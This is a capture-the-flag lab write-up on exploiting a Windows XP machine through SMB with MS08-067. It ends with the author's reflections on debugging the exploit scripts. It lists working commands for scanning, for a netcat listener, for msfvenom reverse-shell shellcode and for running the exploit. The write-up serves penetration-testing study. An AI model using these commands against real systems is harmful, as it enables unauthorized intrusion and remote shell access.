sudo nmap -sC -sV -O -oN nmap/quickscan.txt 10.129.125.96
Two services are identified:
1. netbios-ssn (port:445, likely to be SMB)
According to the scan result, the victim box is likely to be Microsoft Windows XP SP3 (94%) or Microsoft Windows Server 2003 SP1 or SP2 (92%).
We can use nmap to check if the machine is vulnerable to any public CVEs.
locate *.nse | grep smb
Run the script to check the vulnerabilities.
sudo nmap –script smb-vuln* -p 445 -oN nmap/smb_vulns.txt <victim box IP addr>
We can also google for exploit relating to Windows XP SP3 and SMB.
From our enumeration, we can try these two exploits:
Convert this script to python3: https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py
Start the netcat listener:
nc -nlvp 443
Get Local Machine IP:
ip addr | grep tun0
Generate the shellcode using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL MACHINE IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Copy the shellcode to exploit.py script.
Run the exploit script (make sure you have
pip3 install impacket).
Remember that the machine is Windows XP and likely to be SP3. So let’s choose choice 6.
python3 exploit.py <VICTIM BOX IP ADDR> 6 445
There will be a callback on the listener:
The root.txt is in the Desktop folder.
Reflections on the lab
It took me days to achieve a successful exploit. One of the reason is that I was spending two days on debugging python2 exploit scripts for MS17-010 (eternalblue). There is some issue in using pip2 to install impacket. Therefore I targeted MS08-067 instead.
- If you are stuck with debugging issue, you need to time-box and move on. You can revisit the issue in the future. Eternalblue is one of the famous NSA exploit. I will definitely need to figure out how to fix the issues when running the exploit script.
- I confused LHOST as the IP address of the victim box. Instead I should remember that LHOST is the IP address of the local VM.
- You can enumerate issue using nmap as well and not just with searchsploit.
- Convert python2 scripts to python3 scripts with online tool such as this.